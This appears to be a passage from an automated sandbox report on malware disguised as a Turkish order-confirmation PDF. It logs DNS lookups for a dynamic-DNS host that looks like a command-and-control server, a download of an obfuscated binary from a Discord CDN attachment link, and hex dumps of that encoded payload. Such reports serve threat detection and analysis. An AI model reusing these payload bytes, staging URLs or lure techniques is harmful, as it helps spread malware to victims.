                                Jun 26, 2022 09:43:48.924099922 CEST192.168.2.38.8.8.80x2b24Standard query (0)blessmyhustlelord.ddns.netA (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:51.607608080 CEST192.168.2.38.8.8.80x4b04Standard query (0)blessmyhustlelord.ddns.netA (IP address)IN (0x0001)
                                Jun 26, 2022 09:44:11.454999924 CEST192.168.2.38.8.8.80xb37aStandard query (0)blessmyhustlelord.ddns.netA (IP address)IN (0x0001)

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                Jun 26, 2022 09:42:47.607784033 CEST8.8.8.8192.168.2.30xf2b2No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                Jun 26, 2022 09:42:47.607784033 CEST8.8.8.8192.168.2.30xf2b2No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                Jun 26, 2022 09:42:47.607784033 CEST8.8.8.8192.168.2.30xf2b2No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                Jun 26, 2022 09:42:47.607784033 CEST8.8.8.8192.168.2.30xf2b2No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                Jun 26, 2022 09:42:47.607784033 CEST8.8.8.8192.168.2.30xf2b2No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:08.881994963 CEST8.8.8.8192.168.2.30x4a2cNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:08.881994963 CEST8.8.8.8192.168.2.30x4a2cNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:08.881994963 CEST8.8.8.8192.168.2.30x4a2cNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:08.881994963 CEST8.8.8.8192.168.2.30x4a2cNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:08.881994963 CEST8.8.8.8192.168.2.30x4a2cNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:10.774064064 CEST8.8.8.8192.168.2.30xf7d7No error (0)blessmyhustlelord.ddns.net37.0.14.195A (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:13.544734001 CEST8.8.8.8192.168.2.30x88e8No error (0)blessmyhustlelord.ddns.net37.0.14.195A (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:16.214441061 CEST8.8.8.8192.168.2.30xbbc8No error (0)blessmyhustlelord.ddns.net37.0.14.195A (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:17.139172077 CEST8.8.8.8192.168.2.30xca4cNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:17.139172077 CEST8.8.8.8192.168.2.30xca4cNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:17.139172077 CEST8.8.8.8192.168.2.30xca4cNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:17.139172077 CEST8.8.8.8192.168.2.30xca4cNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:17.139172077 CEST8.8.8.8192.168.2.30xca4cNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:21.631690025 CEST8.8.8.8192.168.2.30xbd6aNo error (0)blessmyhustlelord.ddns.net37.0.14.195A (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:24.216413021 CEST8.8.8.8192.168.2.30xcaa3No error (0)blessmyhustlelord.ddns.net37.0.14.195A (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:27.015767097 CEST8.8.8.8192.168.2.30xf5b4No error (0)blessmyhustlelord.ddns.net37.0.14.195A (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:29.777625084 CEST8.8.8.8192.168.2.30x2abaNo error (0)blessmyhustlelord.ddns.net37.0.14.195A (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:32.433199883 CEST8.8.8.8192.168.2.30xf76aNo error (0)blessmyhustlelord.ddns.net37.0.14.195A (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:35.058957100 CEST8.8.8.8192.168.2.30x1bd7No error (0)blessmyhustlelord.ddns.net37.0.14.195A (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:38.407360077 CEST8.8.8.8192.168.2.30xfeccNo error (0)blessmyhustlelord.ddns.net37.0.14.195A (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:41.147382021 CEST8.8.8.8192.168.2.30x7b86No error (0)blessmyhustlelord.ddns.net37.0.14.195A (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:43.747239113 CEST8.8.8.8192.168.2.30x3b18No error (0)blessmyhustlelord.ddns.net37.0.14.195A (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:46.329695940 CEST8.8.8.8192.168.2.30x1b19No error (0)blessmyhustlelord.ddns.net37.0.14.195A (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:48.941359043 CEST8.8.8.8192.168.2.30x2b24No error (0)blessmyhustlelord.ddns.net37.0.14.195A (IP address)IN (0x0001)
                                Jun 26, 2022 09:43:51.630036116 CEST8.8.8.8192.168.2.30x4b04No error (0)blessmyhustlelord.ddns.net37.0.14.195A (IP address)IN (0x0001)
                                Jun 26, 2022 09:44:11.476694107 CEST8.8.8.8192.168.2.30xb37aNo error (0)blessmyhustlelord.ddns.net37.0.14.195A (IP address)IN (0x0001)

                                HTTP Request Dependency Graph

                                • cdn.discordapp.com

                                HTTPS Proxied Packets

                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.2.349716162.159.130.233443C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe
                                TimestampkBytes transferredDirectionData
                                2022-06-26 07:42:48 UTC0OUTGET /attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhm HTTP/1.1
                                User-Agent: lVali
                                Host: cdn.discordapp.com
                                2022-06-26 07:42:48 UTC0INHTTP/1.1 200 OK
                                Date: Sun, 26 Jun 2022 07:42:48 GMT
                                Content-Type: application/octet-stream
                                Content-Length: 279040
                                Connection: close
                                CF-Ray: 72144eee880abb5b-FRA
                                Accept-Ranges: bytes
                                Cache-Control: public, max-age=31536000
                                Content-Disposition: attachment;%20filename=Eluiezilfwmdrgrdfrqpnwmurrnwnhm
                                ETag: "7d74af495b07aad93486870343b767e3"
                                Expires: Mon, 26 Jun 2023 07:42:48 GMT
                                Last-Modified: Sun, 26 Jun 2022 05:30:40 GMT
                                Vary: Accept-Encoding
                                CF-Cache-Status: MISS
                                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                x-goog-generation: 1656221440589477
                                x-goog-hash: crc32c=Xt3y7g==
                                x-goog-hash: md5=fXSvSVsHqtk0hocDQ7dn4w==
                                x-goog-metageneration: 1
                                x-goog-storage-class: STANDARD
                                x-goog-stored-content-encoding: identity
                                x-goog-stored-content-length: 279040
                                X-GUploader-UploadID: ADPycdu_Q0Tpycrk7qS4E4nzePhDznye5MF6EVmpLkOqf7VktTc-kyY8fGFrFg0abSjemjhV5OiEBDAd8z50hKsfTtoAqBDmNq2v
                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=P4hq7FwYClRoOBJKDSoiJfy5Ac%2FwQ9PfUtJ%2FI7GBUdPo4s6kyuCtSRAf%2Fucz36kazVouAf4UMCaC7aF8JTaey%2FwS9FJVFEVtewmWpoQIs%2BJ15Cv8cPZoGocgY4Vyun1OSrt7QA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                2022-06-26 07:42:48 UTC1INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                2022-06-26 07:42:48 UTC1INData Raw: 28 7f b5 25 de 25 25 25 29 25 25 25 da da 25 25 dd 25 25 25 25 25 25 25 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 dc 25 25 33 fa df 33 25 d9 e4 a8 fc dd dc 71 a8 fc 79 8d 44 4e 45 95 97 4a 42 97 3c 48 45 3e 3c 93 93 4a 99 45 87 40 45 97 50 93 45 44 93 45 69 2a 2e 45 48 4a 89 40 53 e8 e8 2f 49 25 25 25 25 25 25 25 19 fb 3d ab d5 92 9b b0 d5 92 9b b0 d5 92 9b b0 0e 86 9d b0 92 92 9b b0 ba cd 58 b0 8e 92 9b b0 ba cd a1 b0 96 92 9b b0 ba cd 97 b0 d7 92 9b b0 63 9a 04 b0 90 92 9b b0 7d cd 58 b0 8e 92 9b b0 63 9a 3b b0 8c 92 9b b0 d5 92 52 b0 a5 db 9b b0 0e 9a 06 b0 7e 92 9b b0 ab 6c 58 b0 47 92 9b b0 ab 6c a1 b0 8c 92 9b b0 86 4f 01 b0 d9 92 9b b0 52 8c 95 b0 8c 92 9b b0 77 44 3e 8d d5 92 9b
                                Data Ascii: (%%%%)%%%%%%%%%%%%e%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%33%qyDNEJB<HE><JE@EPEDEi*.EHJ@S/I%%%%%%%=Xc}Xc;R~lXGlORwD>
                                2022-06-26 07:42:48 UTC2INData Raw: 59 65 25 ec 79 24 93 99 40 97 8b 3c 3e 40 89 2a 87 8f 40 3e 99 66 e5 da 00 b5 cc 1c 25 66 e5 da 00 b1 cc 1c 25 66 e5 da 00 ad cc 1c 25 66 e5 da 00 a9 cc 1c 25 66 e5 da 00 a5 cc 1c 25 66 e5 da 00 c9 cc 1c 25 66 e5 da 00 a1 cc 1c 25 66 e5 da 00 c5 cc 1c 25 66 e5 da 00 9d cc 1c 25 66 e5 da 00 99 cc 1c 25 66 e5 da 00 95 cc 1c 25 66 e5 da 00 91 cc 1c 25 66 e5 da 00 8d cc 1c 25 66 e5 da 00 89 cc 1c 25 66 e5 da 00 85 cc 1c 25 66 e5 da 00 81 cc 1c 25 66 e5 da 00 7d cc 1c 25 66 e5 da 00 79 cc 1c 25 66 e5 da 00 75 cc 1c 25 66 e5 da 00 c1 cc 1c 25 66 e5 da 00 71 cc 1c 25 66 e5 da 00 6d cc 1c 25 66 e5 da 00 69 cc 1c 25 66 e5 da 00 d9 cc 1c 25 66 e5 da 00 d5 cc 1c 25 66 e5 da 00 d1 cc 1c 25 66 e5 da 00 65 cc 1c 25 66 e5 da 00 61 cc 1c 25 66 e5 da 00 e9 cc 1c 25 66 e5
                                Data Ascii: Ye%y$@<>@*@>f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f}%fy%fu%f%fq%fm%fi%f%f%f%fe%fa%f%f
                                2022-06-26 07:42:48 UTC4INData Raw: 25 66 2b 66 65 2d 75 0d 3b 21 da da 60 e5 50 2f a2 e0 ed c0 1c 25 dc 25 25 25 66 2b 0d ec d8 da da 66 69 49 29 64 2b dd 11 c0 1c 25 16 2b 50 b1 0e e5 64 e2 5e a1 49 31 25 99 ec 66 69 49 2d 64 e2 66 69 49 31 06 69 49 2d 64 22 29 5e e9 3d 38 3a 83 36 9e 66 e5 2e 7b 32 30 5e e9 0d 66 b4 64 39 49 68 99 49 2d 68 a1 49 29 68 91 49 31 66 f5 66 ef 5c bc 25 15 da da 64 71 49 35 de 39 49 5c e7 da ea 25 25 5c 07 25 15 da da 64 79 49 39 66 69 49 35 64 de 66 69 49 39 06 69 49 35 64 1e 29 7c 11 c0 1c 25 64 e2 c6 36 66 e2 66 65 2d 64 2b 66 e2 66 65 31 de 2b 64 20 25 66 2b 16 69 49 35 4e 2b 66 69 49 35 64 2b 66 20 25 16 69 49 39 9b e2 66 69 49 39 64 20 25 66 2b 16 20 25 4e fa 8f 29 8d 25 35 25 25 66 20 25 06 2b 75 66 2b 75 0d 4b d6 da da 60 e5 50 2b 0e e5 64 de c6 ea 66
                                Data Ascii: %f+fe-u;!`P/%%%%f+fiI)d+%+Pd^I1%fiI-dfiI1iI-d")^=8:6f.{20^fd9IhI-hI)hI1ff\%dqI59I\%%\%dyI9fiI5dfiI9iI5d)|%d6ffe-d+ffe1+d %f+iI5N+fiI5d+f %iI9fiI9d %f+ %N)%5%%f %+uf+uK`P+df
                                2022-06-26 07:42:48 UTC5INData Raw: 0d f9 1b da da eb e0 e9 c0 1c 25 25 7c 49 0b 1c 25 75 0d c7 1b da da 0e e5 7e 49 0b 1c 25 7c 11 c0 1c 25 64 20 1d c6 f6 8d 25 a5 25 25 8f 25 66 20 1d 66 65 2d 75 0d b3 1b da da 66 20 1d 66 25 64 20 1d dd 11 c0 1c 25 16 20 1d 50 b6 dd 11 c0 1c 25 0d 43 d2 da da dd 21 c0 1c 25 0d 39 d2 da da dd 4d 0b 1c 25 0d 2f d2 da da 7c 09 c0 1c 25 64 20 21 5e 58 21 25 99 fc 66 20 21 66 25 7e 09 c0 1c 25 66 20 21 75 0d 08 1b da da 7c 09 c0 1c 25 64 20 21 5e 58 21 25 50 ba 0e e5 7f 34 34 89 64 35 8d b2 41 65 25 a5 18 28 05 1c 25 25 99 2f 8d f1 c0 1c 25 0d 02 1b da da 8d f1 c0 1c 25 0d 00 1b da da 9e c4 8a 41 25 25 c6 b6 34 34 38 9e b5 2e 5e e9 1d 16 e0 3d 0b 1c 25 50 e4 66 75 29 64 f0 3d 0b 1c 25 66 75 29 64 39 49 66 75 2d 5c 1f 25 35 25 25 5a 73 16 29 49 50 f2 60 f7 54
                                Data Ascii: %%|I%u~I%|%d %%%%f fe-uf f%d % P%C!%9M%/|%d !^X!%f !f%~%f !u|%d !^X!%P44d5Ae%(%%/%%A%%448.^=%Pfu)d=%fu)d9Ifu-\%5%%Zs)IP`T
                                2022-06-26 07:42:48 UTC6INData Raw: 29 66 e2 7e 45 0b 1c 25 66 22 29 7e 41 0b 1c 25 d5 dc 5e e9 35 3a 83 36 9e 68 65 25 2e 5e e9 1d 66 fd 66 f9 68 1e 29 0d 19 1b da da 5e 61 49 25 99 e6 66 e9 0d 32 da da da a9 e5 50 29 0e e5 c6 27 d5 dc 34 7f 36 9e b5 2e 7b 5e e9 1d 66 17 66 fd 66 f1 68 7b 29 66 9e 0d 46 d2 da da 5e 61 49 25 99 e6 66 e9 0d 4b da da da a9 e5 50 29 0e e5 c6 27 d5 dc 34 7f 83 36 9e 68 65 25 2c 66 f9 0e a4 64 2f 60 e5 54 de 5e e5 de 9c 1d 27 18 25 29 25 25 5a f4 66 e8 49 0b 1c 25 66 71 5c 19 64 2f 5e 5f 25 50 2d 65 18 dc 29 25 25 50 c2 66 27 7f 9e 68 65 25 2e 7b 32 30 5e e9 19 66 fd 68 99 49 2d 9a 3d 0b 1c 25 98 41 0b 1c 25 7c 35 0b 1c 25 64 2b 66 2b 16 7d 2d ea b3 86 25 25 25 66 e2 64 2b 66 2b 66 65 2d 16 fd ea b3 bf 25 25 25 66 3b 64 7f 2d 66 3b 66 77 29 64 3b 66 3b 16 7f 2d
                                Data Ascii: )f~E%f")~A%^5:6he%.^ffh)^aI%f2P)'46.{^fffh{)fF^aI%fKP)'46he%,fd/`T^'%)%%ZfI%fq\d/^_%P-e)%%Pf'he%.{20^fhI-=%A%|5%d+f+}-%%%fd+f+fe-%%%f;d-f;fw)d;f;-
                                2022-06-26 07:42:48 UTC8INData Raw: 65 25 a5 18 28 05 1c 25 25 99 2f 8d f1 c0 1c 25 0d 3f 11 da da 9e c4 d1 37 25 25 c6 c0 66 20 21 36 66 c0 38 9e 66 e5 2e 7b 32 30 5e e9 19 66 ff 5e 9e e2 5e be 21 5e d6 31 58 e0 96 31 25 25 25 5e 0d 29 64 29 49 66 29 49 66 55 5c 0b 21 da da 5a 66 29 49 de eb 64 69 49 29 16 ce 50 e2 d5 dc c4 98 dc 25 25 16 ce ea b3 b5 25 25 25 66 13 06 c6 66 79 49 29 16 f0 45 0b 1c 25 50 51 04 08 45 0b 1c 25 dc 08 41 0b 1c 25 5e 18 41 0b 1c 25 31 ea 68 4a dc 25 25 dc 08 45 0b 1c 25 04 08 41 0b 1c 25 66 03 c4 81 dc 25 25 64 69 49 29 66 69 49 29 1b 25 27 50 3d 66 69 49 29 64 69 49 2d 66 69 49 2d de 8d 2d 66 69 49 2d 0d 2c d0 da da 5e d8 31 a1 fe 66 29 49 de 9e 64 69 49 29 5e a8 27 66 69 49 29 64 4d 66 69 49 29 5e e5 29 0d 67 1b da da c4 ea dc 25 25 66 03 c4 2d dc 25 25 66 d6
                                Data Ascii: e%(%%/%?7%%f !6f8f.{20^f^^!^1X1%%%^)d)If)IfU\!Zf)IdiI)P%%%%%ffyI)E%PQE%A%^A%1hJ%%E%A%f%%diI)fiI)%'P=fiI)diI-fiI--fiI-,^1f)IdiI)^'fiI)dMfiI)^)g%%f-%%f
                                2022-06-26 07:42:48 UTC9INData Raw: 2b a5 5d 47 50 e8 66 2b a5 9d dc 47 50 e0 5e 2b 27 c6 ba 0e c8 66 2b 64 69 49 31 c6 36 66 2b a5 5d 47 50 65 66 2b 75 0d 7b c0 da da 64 2b c6 39 66 2b 75 0d 6f c0 da da 64 e2 66 e2 06 2b de 0d 66 e2 64 2b 66 2b af 3d a9 b6 99 e0 a5 d6 47 50 ba 66 2b a5 5d 25 99 45 66 2b 75 0d 47 c0 da da 64 2b c6 39 66 2b 75 0d 3b c0 da da 64 e2 66 e2 06 2b de 0d 66 e2 64 2b 66 2b a5 5d 45 52 c3 66 69 49 29 66 b0 0d 9d f4 25 25 66 69 49 31 64 2b 66 69 49 29 66 25 64 69 49 35 0e c8 c6 56 66 2b a5 5d 47 50 75 66 2b 75 0d b0 09 da da 64 2b c6 49 66 2b 75 0d a4 09 da da 64 e2 66 2b 16 e2 4e 39 66 2b af 25 66 79 49 35 ad 29 4f da 2b 20 66 2b 16 e2 97 11 66 2b af 3d a9 b6 99 e0 a5 d6 47 50 aa 66 2b a5 5d 25 99 55 66 2b 75 0d 6c 09 da da 64 2b c6 49 66 2b 75 0d 60 09 da da 64 e2
                                Data Ascii: +]GPf+GP^+'f+diI16f+]GPef+u{d+9f+uodf+fd+f+=GPf+]%Ef+uGd+9f+u;df+fd+f+]ERfiI)f%%fiI1d+fiI)f%diI5Vf+]GPuf+ud+If+udf+N9f+%fyI5)O+ f+f+=GPf+]%Uf+uld+If+u`d
                                2022-06-26 07:42:48 UTC10INData Raw: 59 65 25 25 25 a0 53 e1 c7 8c 12 65 25 25 65 9b 5f 46 e6 03 5f 65 25 25 0d 64 29 fe a2 af 63 65 25 25 87 d1 a0 c6 9d 88 1c 65 25 a5 9f f2 92 4b b2 fd 69 65 25 b5 d1 93 57 9d ab 62 6d 65 25 d9 32 2f 1a 3b 8d 84 26 65 25 7c c8 f1 f3 f6 e7 ae 73 65 c5 a9 39 65 3c 2c 34 a9 77 65 ed 80 f4 b5 94 80 4a 80 30 65 5f ea 45 19 02 6a a6 f3 7d 65 a9 e4 b9 1d 9d 14 1a 5c 81 65 c0 e6 94 5b b2 e2 6a 7c 3a 65 ba 73 42 29 a8 a4 17 a4 87 65 bb 47 5c 20 65 a1 4a 21 40 65 c3 90 95 06 cd 88 a0 78 44 65 b0 cb aa da 24 fa 9d e7 ae 65 7e 39 76 a0 3b 86 8e ca 18 1c 05 b1 c4 a5 a4 22 df 6e cd 1c cf f2 0b 5a 06 7c 3b db 37 67 46 30 02 14 68 d2 95 05 a1 67 55 a4 61 be da bb 77 af c2 67 b3 03 d4 78 d6 c6 a3 cf 2c 1e b1 0a 8f 81 f4 21 4b f7 96 1e 9b be f1 17 04 0a a9 5c 4b 69 f7 2f b5
                                Data Ascii: Ye%%%Se%%e_F_e%%d)ce%%e%Kie%Wbme%2/;&e%|se9e<,4weJ0e_Ej}e\e[j|:esB)eG\ eJ!@exDe$e~9v;"nZ|;7gF0hgUawgx,!K\Ki/
                                2022-06-26 07:42:48 UTC12INData Raw: 7b 8b 66 57 8b e4 1b 99 f2 8b 5c 23 25 e5 4e 35 75 66 25 0d 9d da da da 7d 99 e0 64 cc 83 da bc 83 66 2d da 3c 15 9e b5 77 2c 2e a9 f7 a1 de da 75 19 0c f7 68 71 49 35 89 66 3f 64 f4 64 44 2d a2 1c 29 f4 12 65 25 64 1c 31 89 64 2f 36 34 7f 9e c4 5f dc 25 25 66 69 49 51 66 65 31 60 e5 99 33 66 2d d7 5c 75 da 2c 21 7d 0d e4 25 25 25 0d cd 27 25 25 9e 68 65 25 66 35 da 77 1d 9e 66 e5 2e 66 fd 66 9e 66 35 da 77 09 66 9e 36 9e 66 e5 a9 f7 5a dc 9e 75 77 66 35 da 77 0d 7f 7d 9e b5 a5 18 4d e5 1c 25 dc 9b ec 8f 25 8f 25 8f 25 8d ba 1f c8 33 da f0 39 05 1c 25 9e b5 a5 18 4d e5 1c 25 25 99 f2 75 75 77 79 8f 27 8f 25 8d 09 1f c8 33 da f0 39 05 1c 25 5e e9 2d 7d 9e 68 65 25 79 8f dc 8f 25 8d 05 1f c8 33 da f0 39 05 1c 25 5e e9 29 7d 9e 68 65 25 a5 18 4d e5 1c 25 dc
                                Data Ascii: {fW\#%N5uf%}df-<w,.uhqI5f?ddD-)e%d1d/64_%%fiIQfe1`3f-\u,!}%%%'%%he%f5wf.fff5wf6fZuwf5w}M%%%%39%M%%uuwy'%39%^-}he%y%39%^)}he%M%
                                2022-06-26 07:42:48 UTC13INData Raw: 65 29 64 20 21 0e e5 30 8d 38 61 65 25 89 da 55 89 64 45 60 b6 a3 f6 26 64 83 31 66 20 21 66 69 fd 29 64 20 1d 5e 58 1d 25 99 de da 30 1d 60 b6 5a c0 0e e5 7f 34 34 89 64 35 c6 39 c4 1b d6 da da 0d 7c da da da 0d 9d d8 da da 0d a2 d8 da da 3a 83 36 34 34 38 9e 30 66 11 5e e9 1d 2e 7b 32 9a 5d 0b 1c 25 66 22 2d 60 e5 99 79 66 55 0e b6 66 65 29 64 20 21 0e e5 30 8d a8 61 65 25 89 da 55 89 64 45 16 ce a3 3f 66 20 21 66 29 fd 64 20 1d 1e 64 3a 31 5e 58 1d 25 99 de da 30 1d 16 ce 5a 0b 0e e5 7f 34 34 89 64 35 c6 39 c4 ab d6 da da 0d 0c da da da 0d 2d d8 da da 0d 32 d8 da da 3a 83 36 34 34 38 9e 2c 7b 32 e3 5d 0b 1c 25 68 58 e9 94 e6 25 25 25 ce 80 6a e0 7d 0b 1c 25 6a e0 79 0b 1c 25 64 08 71 0b 1c 25 64 f8 75 0b 1c 25 7e 65 0b 1c 25 64 f0 6d 0b 1c 25 68 28 e9
                                Data Ascii: e)d !08ae%UdE`&d1f !fi)d ^X%0`Z44d59|:64480f^.{2]%f"-`yfUfe)d !0ae%UdE?f !f)d d:1^X%0Z44d59-2:6448,{2]%hX%%%j}%jy%dq%du%~e%dm%h(
                                2022-06-26 07:42:48 UTC14INData Raw: 0d 7c f5 da da 38 e7 29 25 b5 2e 7b 32 30 5c e9 29 15 da da 75 5e e9 21 66 cc 64 39 49 66 1d 60 1b 5a e4 66 a2 0d a9 23 da da c6 3a 68 93 dc 5c d8 da e2 25 25 58 4d 7b 68 69 49 2d 66 71 49 29 df da ea 25 25 0d a9 da da da 66 fd 60 b6 a1 ea 68 79 49 29 66 a2 66 a6 0d 1c da da da c6 51 66 b8 de b6 66 a2 66 ae 0d 57 29 25 25 7b 66 e2 66 71 49 29 66 ae 0d 79 da da da 66 fd 60 b6 58 27 0e b6 66 a2 66 ae 0d ee 29 25 25 5c e9 29 35 25 25 38 3a 83 36 9e 77 64 07 94 dc 25 25 25 0d d6 23 da da 7f 9e b5 0c a4 60 f7 99 fc 77 5f 2f 99 f2 5f 6f dc 99 ec 5f 6f 27 99 e6 5f 6f de 99 e0 5e e7 29 c6 0d 67 67 67 64 ac 7f 04 ac c4 f1 23 da da 9e 68 65 25 0c a4 60 f7 99 08 77 8b 16 2f 99 45 8b 16 6f 27 99 f2 8b 16 6f 29 99 33 8b 16 6f 2b 99 e0 5e e7 2d c6 09 5e e7 27 5e e7 27
                                Data Ascii: |8)%.{20\)u^!fd9If`Zf#:h\%%XM{hiI-fqI)%%f`hyI)ffQfffW)%%{ffqI)fyf`X'ff)%%\)5%%8:6wd%%%#`w_/_o_o'_o^)gggd#he%`w/Eo'o)3o+^-^'^'
                                2022-06-26 07:42:48 UTC16INData Raw: 25 25 25 75 0d a9 a6 da da 5e 9e 29 73 50 0d 83 36 9e 68 65 25 60 f7 ea a9 e1 da da da 66 6f 21 ac c4 ea a9 8c da da da 2c 77 75 0d 30 a6 da da 60 e5 ea a9 4c da da da 9e 2e 7b 32 30 5c e9 29 15 da da 75 5e e9 21 66 cc 64 39 49 66 1d 60 1b 5a e4 66 a2 0d a5 da da da c6 38 68 93 dc 5c d8 da e2 25 25 58 4d 7b 68 69 49 2d 66 71 49 29 df da e2 25 25 0d 41 1f da da 66 fd 60 b6 a3 ea 68 79 49 29 66 a2 66 a6 0d 14 25 25 25 c6 4f 66 b8 66 a2 66 ae 0d ad dc 25 25 7b 66 e2 66 71 49 29 66 ae 0d 13 d4 da da 66 fd 60 b6 58 27 0e b6 66 a2 66 ae 0d 44 dc 25 25 5c e9 29 35 25 25 38 3a 83 36 9e 66 e5 60 a4 ea a9 31 da da da 75 2c 77 0d cd ef da da 60 e5 ea a9 f1 23 da da 7f da 57 64 27 0d cb ef da da 9e b5 0c a4 60 f7 99 08 77 8b 16 2f 99 45 8b 16 6f 27 99 f2 8b 16 6f 29
                                Data Ascii: %%%u^)sP6he%`fo!,wu0`L.{20\)u^!fd9If`Zf8h\%%XM{hiI-fqI)%%Af`hyI)ff%%%Offf%%{ffqI)ff`X'ffD%%\)5%%8:6f`1u,w`#Wd'`w/Eo'o)
                                2022-06-26 07:42:48 UTC17INData Raw: da da da 2a 5a 0d 38 c6 57 30 64 b0 64 fd de 81 53 27 64 17 0d fa da da da 2a 5a 15 38 c6 41 66 de 5e 9e 29 0d 42 33 25 25 2a 5a ce c6 e8 66 de 5e 9e 29 0d 45 e2 25 25 2a 5a ce 3a 83 36 9e b5 5e 18 3d e5 1c 25 25 99 e2 da f0 3d e5 1c 25 9e d5 35 0d 60 03 da da 9e 2e 7b 32 30 64 9e 64 fb 0c e5 af 1c dc 68 a1 2d 2f 66 4a 21 0c e5 66 2a 1d 2c 66 2a 29 04 9c a3 e6 64 e7 dc 15 dc ff 0d 1d 03 da da 66 22 29 66 f2 66 37 af 2f a5 d4 2f 99 0c a5 d4 e6 99 18 a5 d4 31 99 24 a5 d4 e8 99 30 a5 d4 33 99 95 a5 d4 ea ea a9 a5 25 25 25 a5 d4 ec ea a9 ad 25 25 25 d5 27 38 3a 83 36 c4 f4 03 da da 66 39 55 dc fd 0d 5e ce da da dd 29 25 25 25 c6 58 66 39 55 dc fd 0d 03 d4 da da dd 29 25 25 25 c6 91 68 39 55 dc fd 0d 2c da da da dd 35 25 25 25 c6 36 0c a4 af 6f dc da 99 ec 27
                                Data Ascii: *Z8W0ddS'd*Z8Af^)B3%%*Zf^)E%%*Z:6^=%%=%5`.{20ddh-/fJ!f*,f*)df")ff7//1$03%%%%%%'8:6f9U^)%%%Xf9U)%%%h9U,5%%%6o'
                                2022-06-26 07:42:48 UTC18INData Raw: 66 3d 60 b6 5a f6 60 b6 58 e2 d5 29 0d 97 b4 da da 66 20 21 66 30 1d 0d 9a da da da c4 3e dc 25 25 0e da 5e 58 0d 25 99 e8 5e 48 0d 29 66 20 0d 66 5d 5e 48 0d 29 66 20 1d ea db 65 dc dc 20 1d 66 20 1d 66 95 27 66 75 2b 60 f7 99 e2 66 27 64 20 1d c6 e0 0e e5 64 20 1d 66 9e d2 13 64 20 11 66 20 11 74 d2 d6 16 15 99 e2 d5 29 0d 37 b4 da da 5e 20 11 2d 5e 58 0d 25 99 2d 66 20 0d 5e 5d dc 50 61 66 20 0d 64 20 09 16 d6 a3 fa 5e 58 1d 25 99 f4 66 20 0d 5e e5 2d 66 ae ea 8a fb de e7 66 aa 06 a6 66 30 1d 0d 02 da da da 68 20 09 66 30 11 0d ed b2 da da 66 20 09 64 20 0d c6 3e 66 20 0d da 2d 66 20 11 0d 3e b2 da da 64 20 0d 64 58 15 16 38 15 58 de 64 38 15 5e 58 1d 25 99 51 66 30 15 ea 8a fb 66 20 0d 5e e5 2d 0e a4 0d 65 01 da da 66 20 15 75 66 30 21 66 37 66 20 0d
                                Data Ascii: f=`Z`X)f !f0>%%^X%^H)f f]^H)f e f f'fu+`f'd d fd f t)7^ -^X%-f ^]Paf d ^X%f ^-fff0h f0f d >f -f >d dX8Xd8^X%Qf0f ^-ef uf0!f7f
